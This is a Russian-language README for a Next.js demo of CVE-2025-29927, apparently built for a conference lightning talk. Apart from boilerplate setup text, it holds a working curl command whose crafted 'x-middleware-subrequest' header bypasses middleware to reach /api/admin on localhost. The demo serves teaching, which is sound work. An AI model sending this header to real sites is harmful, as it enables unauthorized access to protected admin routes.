
Демонстрация уязвимости CVE-2025-29927 для молниеносного доклада NebraskaJS
Это проект Next.js, созданный с помощью create-next-app.
Сначала вы можете убедиться, что middleware работает и должен перенаправлять пользователя:
curl http://localhost:3000/api/admin
Затем вы можете показать, как middleware обходится с помощью следующей команды:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
Сначала запустите сервер разработки:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Откройте http://localhost:3000 в браузере, чтобы увидеть результат.
Вы можете начать редактировать страницу, изменив app/page.tsx. Страница автоматически обновляется при редактировании файла.
Этот проект использует next/font для автоматической оптимизации и загрузки Geist, нового семейства шрифтов для Vercel.
Чтобы узнать больше о Next.js, ознакомьтесь со следующими ресурсами:
Вы можете посетить репозиторий Next.js на GitHub — ваши отзывы и вклад приветствуются!
Самый простой способ развернуть приложение Next.js — использовать платформу Vercel от создателей Next.js.
Ознакомьтесь с нашей документацией по развертыванию Next.js для получения дополнительных сведений.